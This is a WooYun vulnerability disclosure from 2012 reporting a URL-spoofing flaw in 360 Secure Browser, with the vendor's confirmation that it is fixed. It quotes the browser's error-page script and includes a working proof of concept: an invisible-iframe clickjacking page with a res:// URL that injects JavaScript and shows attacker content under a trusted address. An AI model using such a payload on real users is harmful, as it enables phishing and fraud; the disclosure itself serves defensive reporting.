当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-013359

漏洞标题:360浏览器欺诈漏洞(360安全漏洞序列之一)

相关厂商:奇虎360

漏洞作者: 唐尸三摆手

提交时间:2012-10-14 23:00

修复时间:2012-11-28 23:01

公开时间:2012-11-28 23:01

漏洞类型:设计错误/逻辑缺陷

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-10-14: 细节已通知厂商并且等待厂商处理中
2012-10-15: 厂商已经确认,细节仅向厂商公开
2012-10-18: 细节向第三方安全合作伙伴开放
2012-12-09: 细节向核心白帽子及相关领域专家公开
2012-12-19: 细节向普通白帽子公开
2012-12-29: 细节向实习白帽子公开
2012-11-28: 细节向公众公开

简要描述:

最近360很火啊,又看到微博上乌云发的那个安全问题被水军猛喷,喷乌云就算了,可是某些言论把哥也惹到了,哥毕竟也是那个@360安扬 所骂的 搞web安全的,不懂客户端安全的人里的一个..... 之前报告360的安全问题人家补了感谢都没一个,软件基本都是不完美的,有点漏洞很正常,好好讨论就是,喷就不对了,俺这几天就接着看看到底不懂客户端的人能搞点什么漏洞出来。
360安全浏览器中存在一个安全问题,可以诱导用户访问任意域名但是攻击者可以控制其中的内容,url看起来可信,但是实际上内容却可以是黑客构造的,形成钓鱼欺诈漏洞。

详细说明:

_parse_url: function () {
var tmp = this._error_url.split('/');
this._error_domain = tmp[2];
var regexp = /([^#\?&=]+)=([^#\?&=]+)/gi;
this._error_url_args = {};
var result = null;
while (result = regexp.exec(tmp[3])) {
//try{
// this._error_url_args[ result[1] ] = decodeURIComponent(result[2]);
//}catch(e){
this._error_url_args[result[1]] = result[2];
//}
}
}


访问出错时的一段逻辑

Event.bind($('#button_refresh'), 'click', function (e) {
Stats.add(5); // 5. 点击刷新按钮次数
e.preventDefault();
window.location = Error.info._error_url;
});


跨站了,可信域的一个跨站,那么利用下吧

<style>
body { margin:0; padding:0 }
#top { width:100%; height:500px; background:#ffffff; position: absolute; }
#top input { position: absolute; top:0px; left:0px }
iframe { z-index:1000; position:absolute; filter:alpha(opacity=0); left:-131px; top:-167px }
</style>
<div id="top"><input type="button" value="Google" /></div>
<iframe width="600" height="500" src="res://c:%5cprogra~1%5c360%5c360se%5cpages%5cpages.dll/NAVIERR.HTM#500#javascript:alert(location);x=window.open('res://c:%255cprogra~1%255c360%255c360se%255cpages%255cpages.dll/NAVIERR.HTM%23500%23https://www.google.com');x.document.write('<title>Google</title>i am wooyun');//&x=w"></iframe>


在360自身的资源文件中存在一个xss漏洞,不过该漏洞却发生在res的360信任域,该文件还实现了其他的譬如修改url显示等逻辑,利用这个漏洞就可以实现对任意url的修改但是又可以控制url里的内容

漏洞证明:

修复方案:

360的安扬肯定懂

版权声明:转载请注明来源 唐尸三摆手@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2012-10-15 14:46

厂商回复:

漏洞原因:浏览器对网页输入未作校验,直接将形式“res:// 资源文件路径名/NAVIERR.HTML#XXXX#YYYYYYYYY”的地址显示为“YYYYYYYYY”。导致地址栏显示的URL与页面不符,形成钓鱼欺诈漏洞。
感谢您的反馈,我们已经修复该漏洞,并会尽快发布新版本。您在方便的时候可以再Review下我们的新版本,thx

最新状态:

暂无